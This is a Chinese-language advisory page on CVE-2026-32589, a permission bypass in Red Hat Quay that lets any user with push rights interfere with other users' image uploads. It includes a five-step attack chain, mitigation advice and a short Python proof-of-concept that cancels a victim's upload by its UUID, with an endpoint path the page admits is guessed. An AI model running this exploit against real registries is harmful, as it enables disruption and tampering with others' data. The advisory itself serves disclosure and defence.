CVE-2026-32589 CVSS 7.4 高危

CVE-2026-32589 Red Hat Quay镜像上传越权漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32589

漏洞类型

权限绕过

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Red Hat Quay

漏洞概述

Red Hat Quay在容器镜像上传过程中存在安全缺陷。拥有任意仓库推送权限的已认证用户，可干扰其他用户（包括无权访问的仓库）正在进行的镜像上传。攻击者利用此漏洞可读取、修改或取消目标的上传任务，导致数据泄露、篡改或服务中断，严重影响系统安全。

技术细节

该漏洞源于Red Hat Quay在处理容器镜像上传请求时，会话隔离与权限校验逻辑存在缺陷。具体来说，系统在验证上传操作时，仅检查了请求者是否具备全局的推送权限，而未严格验证请求者是否对目标上传会话所属的仓库拥有合法的访问权。攻击者只要拥有系统中任意一个仓库的Push权限，即可通过构造特定的API请求，指定其他用户正在进行的上传会话ID（UUID）。由于系统缺乏对会话归属权的二次校验，攻击者能够越权读取上传数据、替换上传内容或调用删除接口中断上传过程。这种逻辑漏洞破坏了多租户环境下的数据隔离性。

攻击链分析

STEP 1

步骤1：获取认证

攻击者注册或获取一个Red Hat Quay账户，并获得任意一个仓库的Push权限。

STEP 2

步骤2：识别目标

攻击者监控网络流量或猜测系统正在进行的镜像上传会话UUID。

STEP 3

步骤3：构造恶意请求

攻击者利用自己账户的Token，构造针对目标UUID的API请求（如DELETE、PATCH或GET）。

STEP 4

步骤4：执行越权操作

发送请求到服务器，由于系统未校验上传会话归属权，请求被接受。

STEP 5

步骤5：达成攻击效果

受害者的上传被取消、数据被篡改或读取，导致业务中断或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://quay.example.com"
victim_repo = "target_namespace/private_repo"
victim_upload_uuid = "a1b2c3d4-1234-5678-90ab-cdef12345678"  # UUID of the in-progress upload

# Attacker's credentials (User with push access to ANY repo)
attacker_token = "Bearer <valid_auth_token>"

headers = {
    "Authorization": attacker_token,
    "Content-Type": "application/json"
}

# Exploit: Attempt to delete the victim's upload (Denial of Service)
# Endpoint structure based on typical Quay API patterns
delete_url = f"{target_url}/api/v1/repository/{victim_repo}/uploads/{victim_upload_uuid}"

print(f"[*] Attempting to interrupt upload {victim_upload_uuid}...")

try:
    response = requests.delete(delete_url, headers=headers)
    
    if response.status_code == 204:
        print("[+] Exploit successful: Upload cancelled.")
    elif response.status_code == 403:
        print("[-] Exploit failed: Permission denied (System may be patched).")
    else:
        print(f"[-] Unexpected response: {response.status_code}")
        print(response.text)
        
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Red Hat Quay (具体受影响版本请参考厂商安全公告)

防御指南

临时缓解措施

在未升级补丁前，建议管理员严格审查并缩减拥有Push权限的用户列表，确保只有可信的维护人员持有该权限。同时，建议加强对API访问日志的实时监控，重点分析对上传接口的频繁访问或跨仓库操作请求，一旦发现异常行为（如对非授权仓库上传UUID的操作），应立即封锁相关源IP并重置凭证。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表